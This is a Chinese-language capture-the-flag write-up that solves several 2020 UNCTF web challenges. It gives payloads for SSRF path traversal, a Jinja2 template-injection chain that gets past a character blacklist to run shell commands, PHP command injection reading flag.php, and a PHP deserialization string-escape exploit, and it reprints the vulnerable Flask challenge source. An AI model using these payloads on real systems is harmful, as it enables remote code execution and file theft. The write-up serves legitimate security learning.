2020-UNCTF-Web-wp

记录复现2020UNCTF部分题目

0x01 easy_ssrf

直接

url=00://unctf.com/../../../../../../../flag

image-20201108135113057

0x02 easyflask

admin登陆后可以得到/secret_route_you_do_not_know路由

然后可以测试到guess参数存在SSTI。但是过滤了_ ' " ] %,最后利用|attrrequest绕过过滤,执行命令。

1
/secret_route_you_do_not_know?guess={{app|attr(request.args.param)|attr(request.args.a)|attr(request.args.b)()|attr(request.args.c)(117)|attr(request.args.d)|attr(request.args.e)|attr(request.args.c)(request.args.f)|attr(request.args.c)(request.args.g)(request.args.h)}}&param=__class__&a=__base__&b=__subclasses__&c=__getitem__&d=__init__&e=__globals__&f=__builtins__&g=eval&h=__import__("os").popen('cat%20flag.txt').read()

image-20201108135159161

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
from flask import *
import random as rd
import os

app = Flask(__name__)


def ranstr(num):
    H = 'abcdefghijklmnopqrstuvwxyz0123456789'
    salt = ''
    for i in range(num):
        salt += rd.choice(H)
    return salt


SECRET = ranstr(4)

Flask.secret_key = SECRET

BLACKLIST = ['%', '_', 'eval', 'open', 'flag',
             'in', '-', 'class', 'mro', '[', ']', '\"', '\'']

user_dicts = dict()


def init():
    user_dicts["admin"] = User('admin', ranstr(32))


class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password


def black_list(string):
    for i in string:
        if i in BLACKLIST:
            return True
    return False


@app.route('/', methods=['GET'])
def index():
    if 'username' in session:
        if session['username'] == 'admin':
            return render_template_string(
                "admin login success and check the secret route /secret_route_you_do_not_know")
        else:
            return render_template('hello.html', name=session['username'])
    else:
        return render_template_string("a easy flask problem,first login as the admin")


@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form['username'] if 'username' in request.form else ""
        password = request.form['password'] if 'password' in request.form else ""
        if username == "" or password == "":
            return render_template_string("pass the username or password use get method")
        if username in user_dicts and user_dicts[username].password == password:
            session['username'] = username
            if username == 'admin':
                return render_template_string("admin login success!")
            else:
                return render_template_string("login success!!")
        else:
            return render_template_string("login fail! check /register")
    else:
        return render_template('login.html')


@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form['username'] if 'username' in request.form else ""
        password = request.form['password'] if 'password' in request.form else ""

        if username == "" or password == "":
            return render_template_string("pass the username or password use get method")

        if username not in user_dicts:
            user_dicts[username] = User(username, password)
            return render_template_string("register success")
        else:
            return render_template_string("the user already exists")
    else:
        return render_template('register.html')


@app.route('/secret_route_you_do_not_know', methods=['GET'])
def secret():
    guess = request.args['guess'] if 'guess' in request.args else ''
    secret_num = rd.randint(0, 100000)
    if guess == '':
        return render_template_string("you should 'guess' the secret number")
    try:
        guess_num = int(guess)
        if guess_num == secret_num:
            return render_template_string('final step, check the source code')
        else:
            return render_template_string('you are wrong')
    except Exception:
        if not black_list(guess):
            return render_template_string(guess + ' error!!')
        else:
            return render_template_string('black list filter')


if __name__ == '__main__':
    init()
    app.run(host='0.0.0.0', port=80)

0x03 easyphp

0x04 babyeval

1
?a=echo%20`cat%20flag.php|base64`;

image-20201108153855307

image-20201108153949816

0x05 easyunserialize

简单的字符串逃逸导致的反序列化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
            if($this->password==='easy')
            {
                include('flag.php');
                echo $flag;    
            }
            else
            {
                echo 'wrong password';
            }
        }
    }
    function filter($string){
        return str_replace('challenge','easychallenge',$string);
    }

echo serialize(new a('challengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";',1));
echo "\n";
echo filter(serialize(new a('challengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy";',1)));

image-20201108155650924